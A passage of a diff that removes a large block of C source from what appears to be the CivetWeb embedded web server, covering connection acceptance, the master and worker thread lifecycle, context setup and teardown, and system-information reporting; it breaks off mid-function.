-	worker_thread_run(pwta);
-	mg_free(thread_func_param);
-	return 0;
-}
-#else
-static void *
-worker_thread(void *thread_func_param)
-{
-	struct worker_thread_args *pwta =
-	    (struct worker_thread_args *)thread_func_param;
-	worker_thread_run(pwta);
-	mg_free(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-static void
-accept_new_connection(const struct socket *listener, struct mg_context *ctx)
-{
-	struct socket so;
-	char src_addr[IP_ADDR_STR_LEN];
-	socklen_t len = sizeof(so.rsa);
-	int on = 1;
-
-	if (!listener) {
-		return;
-	}
-
-	if ((so.sock = accept(listener->sock, &so.rsa.sa, &len))
-	    == INVALID_SOCKET) {
-	} else if (!check_acl(ctx, ntohl(*(uint32_t *)&so.rsa.sin.sin_addr))) {
-		sockaddr_to_string(src_addr, sizeof(src_addr), &so.rsa);
-		mg_cry(fc(ctx), "%s: %s is not allowed to connect", __func__, src_addr);
-		closesocket(so.sock);
-	} else {
-		/* Put so socket structure into the queue */
-		DEBUG_TRACE("Accepted socket %d", (int)so.sock);
-		set_close_on_exec(so.sock, fc(ctx));
-		so.is_ssl = listener->is_ssl;
-		so.ssl_redir = listener->ssl_redir;
-		if (getsockname(so.sock, &so.lsa.sa, &len) != 0) {
-			mg_cry(fc(ctx),
-			       "%s: getsockname() failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-
-		/* Set TCP keep-alive. This is needed because if HTTP-level
-		 * keep-alive
-		 * is enabled, and client resets the connection, server won't get
-		 * TCP FIN or RST and will keep the connection open forever. With
-		 * TCP keep-alive, next keep-alive handshake will figure out that
-		 * the client is down and will close the server end.
-		 * Thanks to Igor Klopov who suggested the patch. */
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_KEEPALIVE,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-			mg_cry(fc(ctx),
-			       "%s: setsockopt(SOL_SOCKET SO_KEEPALIVE) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-
-		/* Disable TCP Nagle's algorithm. Normally TCP packets are coalesced
-		 * to effectively fill up the underlying IP packet payload and
-		 * reduce the overhead of sending lots of small buffers. However
-		 * this hurts the server's throughput (ie. operations per second)
-		 * when HTTP 1.1 persistent connections are used and the responses
-		 * are relatively small (eg. less than 1400 bytes).
-		 */
-		if ((ctx != NULL) && (ctx->config[CONFIG_TCP_NODELAY] != NULL)
-		    && (!strcmp(ctx->config[CONFIG_TCP_NODELAY], "1"))) {
-			if (set_tcp_nodelay(so.sock, 1) != 0) {
-				mg_cry(fc(ctx),
-				       "%s: setsockopt(IPPROTO_TCP TCP_NODELAY) failed: %s",
-				       __func__,
-				       strerror(ERRNO));
-			}
-		}
-
-		/* We are using non-blocking sockets. Thus, the
-		 * set_sock_timeout(so.sock, timeout);
-		 * call is no longer required. */
-
-		/* The "non blocking" property should already be
-		 * inherited from the parent socket. Set it for
-		 * non-compliant socket implementations. */
-		set_non_blocking_mode(so.sock);
-
-		so.in_use = 0;
-		produce_socket(ctx, &so);
-	}
-}
-
-
-static void
-master_thread_run(void *thread_func_param)
-{
-	struct mg_context *ctx = (struct mg_context *)thread_func_param;
-	struct mg_workerTLS tls;
-	struct pollfd *pfd;
-	unsigned int i;
-	unsigned int workerthreadcount;
-
-	if (!ctx) {
-		return;
-	}
-
-	mg_set_thread_name("master");
-
-/* Increase priority of the master thread */
-#if defined(_WIN32)
-	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
-#elif defined(USE_MASTER_THREAD_PRIORITY)
-	int min_prio = sched_get_priority_min(SCHED_RR);
-	int max_prio = sched_get_priority_max(SCHED_RR);
-	if ((min_prio >= 0) && (max_prio >= 0)
-	    && ((USE_MASTER_THREAD_PRIORITY) <= max_prio)
-	    && ((USE_MASTER_THREAD_PRIORITY) >= min_prio)) {
-		struct sched_param sched_param = {0};
-		sched_param.sched_priority = (USE_MASTER_THREAD_PRIORITY);
-		pthread_setschedparam(pthread_self(), SCHED_RR, &sched_param);
-	}
-#endif
-
-/* Initialize thread local storage */
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = CreateEvent(NULL, FALSE, FALSE, NULL);
-#endif
-	tls.is_master = 1;
-	pthread_setspecific(sTlsKey, &tls);
-
-	if (ctx->callbacks.init_thread) {
-		/* Callback for the master thread (type 0) */
-		ctx->callbacks.init_thread(ctx, 0);
-	}
-
-	/* Server starts *now* */
-	ctx->start_time = time(NULL);
-
-	/* Start the server */
-	pfd = ctx->listening_socket_fds;
-	while (ctx->stop_flag == 0) {
-		for (i = 0; i < ctx->num_listening_sockets; i++) {
-			pfd[i].fd = ctx->listening_sockets[i].sock;
-			pfd[i].events = POLLIN;
-		}
-
-		if (poll(pfd, ctx->num_listening_sockets, 200) > 0) {
-			for (i = 0; i < ctx->num_listening_sockets; i++) {
-				/* NOTE(lsm): on QNX, poll() returns POLLRDNORM after the
-				 * successful poll, and POLLIN is defined as
-				 * (POLLRDNORM | POLLRDBAND)
-				 * Therefore, we're checking pfd[i].revents & POLLIN, not
-				 * pfd[i].revents == POLLIN. */
-				if ((ctx->stop_flag == 0) && (pfd[i].revents & POLLIN)) {
-					accept_new_connection(&ctx->listening_sockets[i], ctx);
-				}
-			}
-		}
-	}
-
-	/* Here stop_flag is 1 - Initiate shutdown. */
-	DEBUG_TRACE("%s", "stopping workers");
-
-	/* Stop signal received: somebody called mg_stop. Quit. */
-	close_all_listening_sockets(ctx);
-
-	/* Wakeup workers that are waiting for connections to handle. */
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-#if defined(ALTERNATIVE_QUEUE)
-	for (i = 0; i < ctx->cfg_worker_threads; i++) {
-		event_signal(ctx->client_wait_events[i]);
-
-		/* Since we know all sockets, we can shutdown the connections. */
-		if (ctx->client_socks[i].in_use) {
-			shutdown(ctx->client_socks[i].sock, SHUTDOWN_BOTH);
-		}
-	}
-#else
-	pthread_cond_broadcast(&ctx->sq_full);
-#endif
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-
-	/* Join all worker threads to avoid leaking threads. */
-	workerthreadcount = ctx->cfg_worker_threads;
-	for (i = 0; i < workerthreadcount; i++) {
-		if (ctx->worker_threadids[i] != 0) {
-			mg_join_thread(ctx->worker_threadids[i]);
-		}
-	}
-
-#if defined(USE_LUA)
-	/* Free Lua state of lua background task */
-	if (ctx->lua_background_state) {
-		lua_State *lstate = (lua_State *)ctx->lua_background_state;
-		lua_getglobal(lstate, LUABACKGROUNDPARAMS);
-		if (lua_istable(lstate, -1)) {
-			reg_boolean(lstate, "shutdown", 1);
-			lua_pop(lstate, 1);
-			mg_sleep(2);
-		}
-		lua_close(lstate);
-		ctx->lua_background_state = 0;
-	}
-#endif
-
-	DEBUG_TRACE("%s", "exiting");
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	CloseHandle(tls.pthread_cond_helper_mutex);
-#endif
-	pthread_setspecific(sTlsKey, NULL);
-
-	/* Signal mg_stop() that we're done.
-	 * WARNING: This must be the very last thing this
-	 * thread does, as ctx becomes invalid after this line. */
-	ctx->stop_flag = 2;
-}
-
-
-/* Threads have different return types on Windows and Unix. */
-#ifdef _WIN32
-static unsigned __stdcall master_thread(void *thread_func_param)
-{
-	master_thread_run(thread_func_param);
-	return 0;
-}
-#else
-static void *
-master_thread(void *thread_func_param)
-{
-	master_thread_run(thread_func_param);
-	return NULL;
-}
-#endif /* _WIN32 */
-
-
-static void
-free_context(struct mg_context *ctx)
-{
-	int i;
-	struct mg_handler_info *tmp_rh;
-
-	if (ctx == NULL) {
-		return;
-	}
-
-	if (ctx->callbacks.exit_context) {
-		ctx->callbacks.exit_context(ctx);
-	}
-
-	/* All threads exited, no sync is needed. Destroy thread mutex and
-	 * condvars
-	 */
-	(void)pthread_mutex_destroy(&ctx->thread_mutex);
-#if defined(ALTERNATIVE_QUEUE)
-	mg_free(ctx->client_socks);
-	for (i = 0; (unsigned)i < ctx->cfg_worker_threads; i++) {
-		event_destroy(ctx->client_wait_events[i]);
-	}
-	mg_free(ctx->client_wait_events);
-#else
-	(void)pthread_cond_destroy(&ctx->sq_empty);
-	(void)pthread_cond_destroy(&ctx->sq_full);
-#endif
-
-	/* Destroy other context global data structures mutex */
-	(void)pthread_mutex_destroy(&ctx->nonce_mutex);
-
-#if defined(USE_TIMERS)
-	timers_exit(ctx);
-#endif
-
-	/* Deallocate config parameters */
-	for (i = 0; i < NUM_OPTIONS; i++) {
-		if (ctx->config[i] != NULL) {
-#if defined(_MSC_VER)
-#pragma warning(suppress : 6001)
-#endif
-			mg_free(ctx->config[i]);
-		}
-	}
-
-	/* Deallocate request handlers */
-	while (ctx->handlers) {
-		tmp_rh = ctx->handlers;
-		ctx->handlers = tmp_rh->next;
-		mg_free(tmp_rh->uri);
-		mg_free(tmp_rh);
-	}
-
-#ifndef NO_SSL
-	/* Deallocate SSL context */
-	if (ctx->ssl_ctx != NULL) {
-		SSL_CTX_free(ctx->ssl_ctx);
-	}
-#endif /* !NO_SSL */
-
-	/* Deallocate worker thread ID array */
-	if (ctx->worker_threadids != NULL) {
-		mg_free(ctx->worker_threadids);
-	}
-
-	/* Deallocate worker thread ID array */
-	if (ctx->worker_connections != NULL) {
-		mg_free(ctx->worker_connections);
-	}
-
-	/* deallocate system name string */
-	mg_free(ctx->systemName);
-
-	/* Deallocate context itself */
-	mg_free(ctx);
-}
-
-
-void
-mg_stop(struct mg_context *ctx)
-{
-	pthread_t mt;
-	if (!ctx) {
-		return;
-	}
-
-	/* We don't use a lock here. Calling mg_stop with the same ctx from
-	 * two threads is not allowed. */
-	mt = ctx->masterthreadid;
-	if (mt == 0) {
-		return;
-	}
-
-	ctx->masterthreadid = 0;
-
-	/* Set stop flag, so all threads know they have to exit. */
-	ctx->stop_flag = 1;
-
-	/* Wait until everything has stopped. */
-	while (ctx->stop_flag != 2) {
-		(void)mg_sleep(10);
-	}
-
-	mg_join_thread(mt);
-	free_context(ctx);
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	(void)WSACleanup();
-#endif /* _WIN32 && !__SYMBIAN32__ */
-}
-
-
-static void
-get_system_name(char **sysName)
-{
-#if defined(_WIN32)
-#if !defined(__SYMBIAN32__)
-#if defined(_WIN32_WCE)
-	*sysName = mg_strdup("WinCE");
-#else
-	char name[128];
-	DWORD dwVersion = 0;
-	DWORD dwMajorVersion = 0;
-	DWORD dwMinorVersion = 0;
-	DWORD dwBuild = 0;
-	BOOL wowRet, isWoW = FALSE;
-
-#ifdef _MSC_VER
-#pragma warning(push)
-/* GetVersion was declared deprecated */
-#pragma warning(disable : 4996)
-#endif
-	dwVersion = GetVersion();
-#ifdef _MSC_VER
-#pragma warning(pop)
-#endif
-
-	dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
-	dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
-	dwBuild = ((dwVersion < 0x80000000) ? (DWORD)(HIWORD(dwVersion)) : 0);
-	(void)dwBuild;
-
-	wowRet = IsWow64Process(GetCurrentProcess(), &isWoW);
-
-	sprintf(name,
-	        "Windows %u.%u%s",
-	        (unsigned)dwMajorVersion,
-	        (unsigned)dwMinorVersion,
-	        (wowRet ? (isWoW ? " (WoW64)" : "") : " (?)"));
-
-	*sysName = mg_strdup(name);
-#endif
-#else
-	*sysName = mg_strdup("Symbian");
-#endif
-#else
-	struct utsname name;
-	memset(&name, 0, sizeof(name));
-	uname(&name);
-	*sysName = mg_strdup(name.sysname);
-#endif
-}
-
-
-struct mg_context *
-mg_start(const struct mg_callbacks *callbacks,
-         void *user_data,
-         const char **options)
-{
-	struct mg_context *ctx;
-	const char *name, *value, *default_value;
-	int idx, ok, workerthreadcount;
-	unsigned int i;
-	int itmp;
-	void (*exit_callback)(const struct mg_context *ctx) = 0;
-
-	struct mg_workerTLS tls;
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	WSADATA data;
-	WSAStartup(MAKEWORD(2, 2), &data);
-#endif /* _WIN32 && !__SYMBIAN32__ */
-
-	/* Allocate context and initialize reasonable general case defaults. */
-	if ((ctx = (struct mg_context *)mg_calloc(1, sizeof(*ctx))) == NULL) {
-		return NULL;
-	}
-
-	/* Random number generator will initialize at the first call */
-	ctx->auth_nonce_mask =
-	    (uint64_t)get_random() ^ (uint64_t)(ptrdiff_t)(options);
-
-	if (mg_init_library_called == 0) {
-		/* Legacy INIT, if mg_start is called without mg_init_library.
-		 * Note: This may cause a memory leak */
-		mg_init_library(0);
-	}
-
-	tls.is_master = -1;
-	tls.thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = NULL;
-#endif
-	pthread_setspecific(sTlsKey, &tls);
-
-	ok = 0 == pthread_mutex_init(&ctx->thread_mutex, &pthread_mutex_attr);
-#if !defined(ALTERNATIVE_QUEUE)
-	ok &= 0 == pthread_cond_init(&ctx->sq_empty, NULL);
-	ok &= 0 == pthread_cond_init(&ctx->sq_full, NULL);
-#endif
-	ok &= 0 == pthread_mutex_init(&ctx->nonce_mutex, &pthread_mutex_attr);
-	if (!ok) {
-		/* Fatal error - abort start. However, this situation should never
-		 * occur in practice. */
-		mg_cry(fc(ctx), "Cannot initialize thread synchronization objects");
-		mg_free(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	if (callbacks) {
-		ctx->callbacks = *callbacks;
-		exit_callback = callbacks->exit_context;
-		ctx->callbacks.exit_context = 0;
-	}
-	ctx->user_data = user_data;
-	ctx->handlers = NULL;
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	ctx->shared_lua_websockets = 0;
-#endif
-
-	while (options && (name = *options++) != NULL) {
-		if ((idx = get_option_index(name)) == -1) {
-			mg_cry(fc(ctx), "Invalid option: %s", name);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		} else if ((value = *options++) == NULL) {
-			mg_cry(fc(ctx), "%s: option value cannot be NULL", name);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-		if (ctx->config[idx] != NULL) {
-			mg_cry(fc(ctx), "warning: %s: duplicate option", name);
-			mg_free(ctx->config[idx]);
-		}
-		ctx->config[idx] = mg_strdup(value);
-		DEBUG_TRACE("[%s] -> [%s]", name, value);
-	}
-
-	/* Set default value if needed */
-	for (i = 0; config_options[i].name != NULL; i++) {
-		default_value = config_options[i].default_value;
-		if ((ctx->config[i] == NULL) && (default_value != NULL)) {
-			ctx->config[i] = mg_strdup(default_value);
-		}
-	}
-
-	itmp = atoi(ctx->config[MAX_REQUEST_SIZE]);
-
-	if (itmp < 1024) {
-		mg_cry(fc(ctx), "max_request_size too small");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-	ctx->max_request_size = (unsigned)itmp;
-
-	workerthreadcount = atoi(ctx->config[NUM_THREADS]);
-
-	if (workerthreadcount > MAX_WORKER_THREADS) {
-		mg_cry(fc(ctx), "Too many worker threads");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	if (workerthreadcount <= 0) {
-		mg_cry(fc(ctx), "Invalid number of worker threads");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-#if defined(NO_FILES)
-	if (ctx->config[DOCUMENT_ROOT] != NULL) {
-		mg_cry(fc(ctx), "%s", "Document root must not be set");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-#endif
-
-	get_system_name(&ctx->systemName);
-
-#if defined(USE_LUA)
-	/* If a Lua background script has been configured, start it. */
-	if (ctx->config[LUA_BACKGROUND_SCRIPT] != NULL) {
-		char ebuf[256];
-		lua_State *state = (void *)mg_prepare_lua_context_script(
-		    ctx->config[LUA_BACKGROUND_SCRIPT], ctx, ebuf, sizeof(ebuf));
-		if (!state) {
-			mg_cry(fc(ctx), "lua_background_script error: %s", ebuf);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-		ctx->lua_background_state = (void *)state;
-
-		lua_newtable(state);
-		reg_boolean(state, "shutdown", 0);
-
-		struct vec opt_vec;
-		struct vec eq_vec;
-		const char *sparams = ctx->config[LUA_BACKGROUND_SCRIPT_PARAMS];
-
-		while ((sparams = next_option(sparams, &opt_vec, &eq_vec)) != NULL) {
-			reg_llstring(
-			    state, opt_vec.ptr, opt_vec.len, eq_vec.ptr, eq_vec.len);
-			if (mg_strncasecmp(sparams, opt_vec.ptr, opt_vec.len) == 0)
-				break;
-		}
-		lua_setglobal(state, LUABACKGROUNDPARAMS);
-
-	} else {
-		ctx->lua_background_state = 0;
-	}
-#endif
-
-	/* NOTE(lsm): order is important here. SSL certificates must
-	 * be initialized before listening ports. UID must be set last. */
-	if (!set_gpass_option(ctx) ||
-#if !defined(NO_SSL)
-	    !set_ssl_option(ctx) ||
-#endif
-	    !set_ports_option(ctx) ||
-#if !defined(_WIN32)
-	    !set_uid_option(ctx) ||
-#endif
-	    !set_acl_option(ctx)) {
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-#if !defined(_WIN32) && !defined(__SYMBIAN32__)
-	/* Ignore SIGPIPE signal, so if browser cancels the request, it
-	 * won't kill the whole process. */
-	(void)signal(SIGPIPE, SIG_IGN);
-#endif /* !_WIN32 && !__SYMBIAN32__ */
-
-	ctx->cfg_worker_threads = ((unsigned int)(workerthreadcount));
-	ctx->worker_threadids = (pthread_t *)mg_calloc_ctx(ctx->cfg_worker_threads,
-	                                                   sizeof(pthread_t),
-	                                                   ctx);
-	if (ctx->worker_threadids == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker thread ID array");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-	ctx->worker_connections =
-	    (struct mg_connection *)mg_calloc_ctx(ctx->cfg_worker_threads,
-	                                          sizeof(struct mg_connection),
-	                                          ctx);
-	if (ctx->worker_connections == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker thread connection array");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-
-#if defined(ALTERNATIVE_QUEUE)
-	ctx->client_wait_events =
-	    (void **)mg_calloc_ctx(sizeof(ctx->client_wait_events[0]),
-	                           ctx->cfg_worker_threads,
-	                           ctx);
-	if (ctx->client_wait_events == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker event array");
-		mg_free(ctx->worker_threadids);
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	ctx->client_socks =
-	    (struct socket *)mg_calloc_ctx(sizeof(ctx->client_socks[0]),
-	                                   ctx->cfg_worker_threads,
-	                                   ctx);
-	if (ctx->client_wait_events == NULL) {
-		mg_cry(fc(ctx), "Not enough memory for worker socket array");
-		mg_free(ctx->client_socks);
-		mg_free(ctx->worker_threadids);
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-
-	for (i = 0; (unsigned)i < ctx->cfg_worker_threads; i++) {
-		ctx->client_wait_events[i] = event_create();
-		if (ctx->client_wait_events[i] == 0) {
-			mg_cry(fc(ctx), "Error creating worker event %i", i);
-			while (i > 0) {
-				i--;
-				event_destroy(ctx->client_wait_events[i]);
-			}
-			mg_free(ctx->client_socks);
-			mg_free(ctx->worker_threadids);
-			free_context(ctx);
-			pthread_setspecific(sTlsKey, NULL);
-			return NULL;
-		}
-	}
-#endif
-
-
-#if defined(USE_TIMERS)
-	if (timers_init(ctx) != 0) {
-		mg_cry(fc(ctx), "Error creating timers");
-		free_context(ctx);
-		pthread_setspecific(sTlsKey, NULL);
-		return NULL;
-	}
-#endif
-
-	/* Context has been created - init user libraries */
-	if (ctx->callbacks.init_context) {
-		ctx->callbacks.init_context(ctx);
-	}
-	ctx->callbacks.exit_context = exit_callback;
-	ctx->context_type = CONTEXT_SERVER; /* server context */
-
-	/* Start master (listening) thread */
-	mg_start_thread_with_id(master_thread, ctx, &ctx->masterthreadid);
-
-	/* Start worker threads */
-	for (i = 0; i < ctx->cfg_worker_threads; i++) {
-		struct worker_thread_args *wta = (struct worker_thread_args *)
-		    mg_malloc_ctx(sizeof(struct worker_thread_args), ctx);
-		if (wta) {
-			wta->ctx = ctx;
-			wta->index = (int)i;
-		}
-
-		if ((wta == NULL)
-		    || (mg_start_thread_with_id(worker_thread,
-		                                wta,
-		                                &ctx->worker_threadids[i]) != 0)) {
-
-			/* thread was not created */
-			if (wta != NULL) {
-				mg_free(wta);
-			}
-
-			if (i > 0) {
-				mg_cry(fc(ctx),
-				       "Cannot start worker thread %i: error %ld",
-				       i + 1,
-				       (long)ERRNO);
-			} else {
-				mg_cry(fc(ctx),
-				       "Cannot create threads: error %ld",
-				       (long)ERRNO);
-				free_context(ctx);
-				pthread_setspecific(sTlsKey, NULL);
-				return NULL;
-			}
-			break;
-		}
-	}
-
-	pthread_setspecific(sTlsKey, NULL);
-	return ctx;
-}
-
-
-/* Feature check API function */
-unsigned
-mg_check_feature(unsigned feature)
-{
-	static const unsigned feature_set = 0
-/* Set bits for available features according to API documentation.
- * This bit mask is created at compile time, according to the active
- * preprocessor defines. It is a single const value at runtime. */
-#if !defined(NO_FILES)
-	                                    | 0x0001u
-#endif
-#if !defined(NO_SSL)
-	                                    | 0x0002u
-#endif
-#if !defined(NO_CGI)
-	                                    | 0x0004u
-#endif
-#if defined(USE_IPV6)
-	                                    | 0x0008u
-#endif
-#if defined(USE_WEBSOCKET)
-	                                    | 0x0010u
-#endif
-#if defined(USE_LUA)
-	                                    | 0x0020u
-#endif
-#if defined(USE_DUKTAPE)
-	                                    | 0x0040u
-#endif
-#if !defined(NO_CACHING)
-	                                    | 0x0080u
-#endif
-#if defined(USE_SERVER_STATS)
-	                                    | 0x0100u
-#endif
-
-/* Set some extra bits not defined in the API documentation.
- * These bits may change without further notice. */
-#if defined(MG_LEGACY_INTERFACE)
-	                                    | 0x8000u
-#endif
-#if defined(MEMORY_DEBUGGING)
-	                                    | 0x0100u
-#endif
-#if defined(USE_TIMERS)
-	                                    | 0x0200u
-#endif
-#if !defined(NO_NONCE_CHECK)
-	                                    | 0x0400u
-#endif
-#if !defined(NO_POPEN)
-	                                    | 0x0800u
-#endif
-	    ;
-	return (feature & feature_set);
-}
-
-
-/* strcat with additional NULL check to avoid clang scan-build warning. */
-#define strcat0(a, b)                                                          \
-	{                                                                          \
-		if ((a != NULL) && (b != NULL)) {                                      \
-			strcat(a, b);                                                      \
-		}                                                                      \
-	}
-
-
-/* Get system information. It can be printed or stored by the caller.
- * Return the size of available information. */
-static int
-mg_get_system_info_impl(char *buffer, int buflen)
-{
-	char block[256];
-	int system_info_length = 0;
-
-#if defined(_WIN32)
-	const char *eol = "\r\n";
-#else
-	const char *eol = "\n";
-#endif
-
-	const char *eoobj = "}";
-	int reserved_len = (int)strlen(eoobj) + (int)strlen(eol);
-
-	if ((buffer == NULL) || (buflen < 1)) {
-		buflen = 0;
-	} else {
-		*buffer = 0;
-	}
-
-	mg_snprintf(NULL, NULL, block, sizeof(block), "{%s", eol);
-	system_info_length += (int)strlen(block);
-	if (system_info_length < buflen) {
-		strcat0(buffer, block);
-	}
-
-	/* Server version */
-	{
-		const char *version = mg_version();
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"version\" : \"%s\",%s",
-		            version,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-	/* System info */
-	{
-#if defined(_WIN32)
-#if !defined(__SYMBIAN32__)
-		DWORD dwVersion = 0;
-		DWORD dwMajorVersion = 0;
-		DWORD dwMinorVersion = 0;
-		SYSTEM_INFO si;
-
-		GetSystemInfo(&si);
-
-#ifdef _MSC_VER
-#pragma warning(push)
-/* GetVersion was declared deprecated */
-#pragma warning(disable : 4996)
-#endif
-		dwVersion = GetVersion();
-#ifdef _MSC_VER
-#pragma warning(pop)
-#endif
-
-		dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
-		dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"os\" : \"Windows %u.%u\",%s",
-		            (unsigned)dwMajorVersion,
-		            (unsigned)dwMinorVersion,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"cpu\" : \"type %u, cores %u, mask %x\",%s",
-		            (unsigned)si.wProcessorArchitecture,
-		            (unsigned)si.dwNumberOfProcessors,
-		            (unsigned)si.dwActiveProcessorMask,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-#else
-		mg_snprintf(NULL, NULL, block, sizeof(block), "%s - Symbian%s", eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-#else
-		struct utsname name;
-		memset(&name, 0, sizeof(name));
-		uname(&name);
-
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"os\" : \"%s %s (%s) - %s\",%s",
-		            name.sysname,
-		            name.version,
-		            name.release,
-		            name.machine,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Features */
-	{
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"features\" : %lu,%s"
-		            "\"feature_list\" : \"Server:%s%s%s%s%s%s%s%s%s\",%s",
-		            (unsigned long)mg_check_feature(0xFFFFFFFFu),
-		            eol,
-		            mg_check_feature(1) ? " Files" : "",
-		            mg_check_feature(2) ? " HTTPS" : "",
-		            mg_check_feature(4) ? " CGI" : "",
-		            mg_check_feature(8) ? " IPv6" : "",
-		            mg_check_feature(16) ? " WebSockets" : "",
-		            mg_check_feature(32) ? " Lua" : "",
-		            mg_check_feature(64) ? " JavaScript" : "",
-		            mg_check_feature(128) ? " Cache" : "",
-		            mg_check_feature(256) ? " Stats" : "",
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-
-#ifdef USE_LUA
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"lua_version\" : \"%u (%s)\",%s",
-		            (unsigned)LUA_VERSION_NUM,
-		            LUA_RELEASE,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-#if defined(USE_DUKTAPE)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"javascript\" : \"Duktape %u.%u.%u\",%s",
-		            (unsigned)DUK_VERSION / 10000,
-		            ((unsigned)DUK_VERSION / 100) % 100,
-		            (unsigned)DUK_VERSION % 100,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#endif
-	}
-
-	/* Build date */
-	{
-#if defined(__GNUC__)
-#pragma GCC diagnostic push
-/* Disable bogus compiler warning -Wdate-time */
-#pragma GCC diagnostic ignored "-Wall"
-#pragma GCC diagnostic ignored "-Werror"
-#endif
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"build\" : \"%s\",%s",
-		            __DATE__,
-		            eol);
-
-#if defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-	}
-
-
-	/* Compiler information */
-	/* http://sourceforge.net/p/predef/wiki/Compilers/ */
-	{
-#if defined(_MSC_VER)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MSC: %u (%u)\",%s",
-		            (unsigned)_MSC_VER,
-		            (unsigned)_MSC_FULL_VER,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__MINGW64__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW64: %u.%u\",%s",
-		            (unsigned)__MINGW64_VERSION_MAJOR,
-		            (unsigned)__MINGW64_VERSION_MINOR,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW32: %u.%u\",%s",
-		            (unsigned)__MINGW32_MAJOR_VERSION,
-		            (unsigned)__MINGW32_MINOR_VERSION,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__MINGW32__)
-		mg_snprintf(NULL,
-		            NULL,
-		            block,
-		            sizeof(block),
-		            "\"compiler\" : \"MinGW32: %u.%u\",%s",
-		            (unsigned)__MINGW32_MAJOR_VERSION,
-		            (unsigned)__MINGW32_MINOR_VERSION,
-		            eol);
-		system_info_length += (int)strlen(block);
-		if (system_info_length < buflen) {
-			strcat0(buffer, block);
-		}
-#elif defined(__clang__)
-		mg_snprintf(NULL,
